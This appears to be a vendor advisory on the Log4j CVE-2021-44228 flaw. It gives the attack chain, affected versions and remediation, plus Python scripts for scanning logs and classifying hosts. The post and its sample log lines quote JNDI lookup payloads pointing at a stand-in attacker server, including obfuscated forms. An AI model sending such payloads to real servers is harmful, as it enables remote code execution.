On 9 December 2021, a new vulnerability, CVE-2021-44228, was discovered in Log4j, a popular open-source Java logging framework distributed under the Apache Software License. The vulnerability is remotely exploitable without authentication, i.e., it can be exploited over a network with no username or password.
Due to the severity of this vulnerability, PingSafe strongly recommends that customers apply the updates to their library as soon as possible.
Shortly after the vulnerability was published, PingSafe added a check for this exploit to its scans so that customers are alerted to the 0-day.
The Vulnerability:
Log4j is a Java logging framework used to generate logs and record the activity inside an application. The vulnerability can be exploited to gain unauthorised remote code execution on affected servers. Attackers are still using the recently discovered exploit against exposed servers; it lets them execute malicious Java code on the vulnerable server.
- The attacker invokes any server endpoint with a malicious payload.
- The server logs the request data using the Log4j library, and that data contains the malicious payload: ${jndi:ldap://attacker-server.com} (here “attacker-server” refers to the hacker-owned server).
- This payload triggers the Log4j vulnerability: the lookup makes the server send a request to the attacker’s server.
- The request is made via JNDI (Java Naming and Directory Interface), and the attacker’s server responds with a remote Java class file.
- The vulnerable server loads the remote class file, which acts as the second-stage payload and gives the attacker remote code execution.
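The chain above starts with a lookup string landing in a logged field, so the first defensive check is to look for such strings in the request data you already log. The following is an added example (not PingSafe's code and not from the original post) that scans constructed access-log lines for JNDI lookups, first undoing the URL encoding and the nesting tricks (`${lower:...}`, `${upper:...}`, `${...:-default}`) that are commonly used to hide the literal `jndi`. Only that small subset of Log4j's lookup syntax is modelled here, which is an assumption; the scanner is a triage aid, not a substitute for upgrading.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). Lines 1-3 carry
# JNDI lookup strings of the kind described above, in plain and lightly obfuscated
# forms; lines 4-5 are benign, the last one containing a literal "$" after decoding.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker-server.com/a}"',
    '203.0.113.5 - - [10/Dec/2021:10:01:13 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker-server.com/a}"',
    '203.0.113.5 - - [10/Dec/2021:10:01:14 +0000] "GET /api HTTP/1.1" 200 512 "-" "${jndi:${env:NOPE:-r}mi://attacker-server.com/a}"',
    '198.51.100.7 - - [10/Dec/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:02:01 +0000] "GET /search?q=price%20%24100 HTTP/1.1" 200 256 "-" "curl/7.79.1"',
]

# An innermost ${...} lookup: no nested "${" or "}" inside the braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and its scheme (ldap, ldaps, rmi, dns, ...), matched after normalisation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def _resolve_inner(expr):
    """Evaluate the lookups commonly used to hide the string "jndi".

    Only a small subset of Log4j's lookup syntax is modelled (assumption):
    ${lower:x}, ${upper:x} and the ${name:-default} fallback form. Anything
    else is returned unchanged so that the outer loop terminates.
    """
    if ":-" in expr:                      # ${env:NOPE:-r} or ${::-j} evaluates to the default
        return expr.split(":-", 1)[1]
    key, _, value = expr.partition(":")
    key = key.strip().lower()
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    return "${" + expr + "}"


def normalize_lookups(text, max_rounds=10):
    """URL-decode, then repeatedly resolve innermost lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(lambda m: _resolve_inner(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_lookup(text):
    """Return the lower-cased scheme of the first JNDI lookup in text, or None."""
    m = _JNDI.search(normalize_lookups(text))
    return m.group(1).lower() if m else None


def scan_log(lines):
    """Return (line_number, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi_lookup(line)
        if scheme:
            hits.append((number, scheme))
    return hits


if __name__ == "__main__":
    for number, scheme in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {scheme}")
```

Run it over real web-server or WAF logs by replacing `SAMPLE_LOG_LINES` with the lines read from the file; the scheme reported (ldap, rmi, dns) tells you which kind of outbound connection to look for in egress logs from the affected host.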
Affected Systems:
Various applications and cloud services using Apache Struts are exposed to this attack. Security researchers have already shown that the Log4j vulnerability can be exploited against servers operated by Apple, Cloudflare, Twitter and other large companies.
It is highly recommended to upgrade the Log4j framework to log4j-2.15.0-rc2 or higher.
The following versions of Log4j are impacted:
2.0 <= version <= 2.14.1
Check the PingSafe dashboard under Asset Security to find out whether your servers are secure.

Steps for Remediation:
The latest version of Log4j has been released on the official website. You can download it and upgrade your service to use the newest version.
Although upgrading to the latest version of Log4j is recommended, servers running earlier versions can also be secured: set “formatMsgNoLookups=true” on servers running version 2.10.0 or higher. This setting is not required on the updated version, where it has become the default behaviour.
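The two remediation rules above (upgrade out of the 2.0 to 2.14.1 range, or disable lookups on 2.10.0 and later) can be turned into an inventory check. The following is an added example, not PingSafe's code, that classifies constructed host records as not-affected, mitigated or vulnerable. It assumes the log4j-core version can be read from the jar file name, that the setting is passed as the JVM system property `-Dlog4j2.formatMsgNoLookups=true` or as the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true` (the system-property and env-var forms of the `formatMsgNoLookups=true` setting the post names), and it ignores pre-release suffixes such as `-rc2` when comparing versions.

```python
import re

# Constructed host inventory (not from the original post): the jar names, JVM
# arguments and environment an inventory script might collect from each server.
SAMPLE_HOSTS = [
    {"host": "app-1", "jars": ["log4j-core-2.14.1.jar"], "jvm_args": "-Xmx2g", "env": {}},
    {"host": "app-2", "jars": ["log4j-core-2.14.1.jar"],
     "jvm_args": "-Xmx2g -Dlog4j2.formatMsgNoLookups=true", "env": {}},
    {"host": "app-3", "jars": ["log4j-core-2.9.1.jar"],
     "jvm_args": "-Dlog4j2.formatMsgNoLookups=true", "env": {}},
    {"host": "app-4", "jars": ["log4j-core-2.15.0.jar"], "jvm_args": "", "env": {}},
    {"host": "app-5", "jars": ["log4j-core-2.12.1.jar"], "jvm_args": "",
     "env": {"LOG4J_FORMAT_MSG_NO_LOOKUPS": "true"}},
    {"host": "app-6", "jars": ["log4j-1.2.17.jar", "commons-io-2.11.0.jar"], "jvm_args": "", "env": {}},
]

# Ranges from the post: 2.0 <= version <= 2.14.1 is affected, and the
# no-lookups setting only takes effect from 2.10.0 upwards.
AFFECTED_MIN = (2, 0)
AFFECTED_MAX = (2, 14, 1)
MITIGATION_MIN = (2, 10, 0)

_CORE_JAR = re.compile(r"log4j-core-(\d+(?:\.\d+)*)")
_NO_LOOKUPS_PROP = re.compile(r"-Dlog4j2\.formatMsgNoLookups=true(?:\s|$)", re.IGNORECASE)


def parse_version(text):
    """Numeric part of a version string as a tuple; suffixes like -rc2 are dropped (assumption)."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def is_affected_version(version):
    """True if the version falls inside the affected range named in the post."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def lookups_disabled(jvm_args, env):
    """True if message lookups were switched off via the system property or the env var."""
    if _NO_LOOKUPS_PROP.search(jvm_args):
        return True
    return env.get("LOG4J_FORMAT_MSG_NO_LOOKUPS", "").strip().lower() == "true"


def assess_host(host):
    """Classify one host as 'not-affected', 'mitigated' or 'vulnerable', with a reason."""
    versions = [m.group(1) for m in map(_CORE_JAR.search, host["jars"]) if m]
    if not versions:
        return "not-affected", "no log4j-core 2.x jar found"
    affected = [v for v in versions if is_affected_version(v)]
    if not affected:
        return "not-affected", f"log4j-core {', '.join(versions)} is outside the affected range"
    disabled = lookups_disabled(host["jvm_args"], host["env"])
    for version in affected:
        # The setting is only honoured from 2.10.0 on, so on older cores it is no mitigation.
        if not (disabled and parse_version(version) >= MITIGATION_MIN):
            return "vulnerable", f"log4j-core {version} without an effective formatMsgNoLookups mitigation"
    return "mitigated", f"log4j-core {', '.join(affected)} with lookups disabled; upgrade still recommended"


def assess_inventory(hosts):
    """Map each host name to its status."""
    return {h["host"]: assess_host(h)[0] for h in hosts}


if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        status, reason = assess_host(h)
        print(f"{h['host']}: {status} ({reason})")
```

Note that app-3 is reported as vulnerable even though the property is set, because its core is older than 2.10.0; this is the case the post's "2.10.0 and higher" qualifier exists for, and the only fix for such hosts is the upgrade.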
How can PingSafe help?
PingSafe can detect this Log4j vulnerability on your infrastructure without having an agent in place. To protect your cloud infrastructure from this as well as new zero-day vulnerabilities, request your early access to PingSafe at https://www.pingsafe.ai/company/contactus.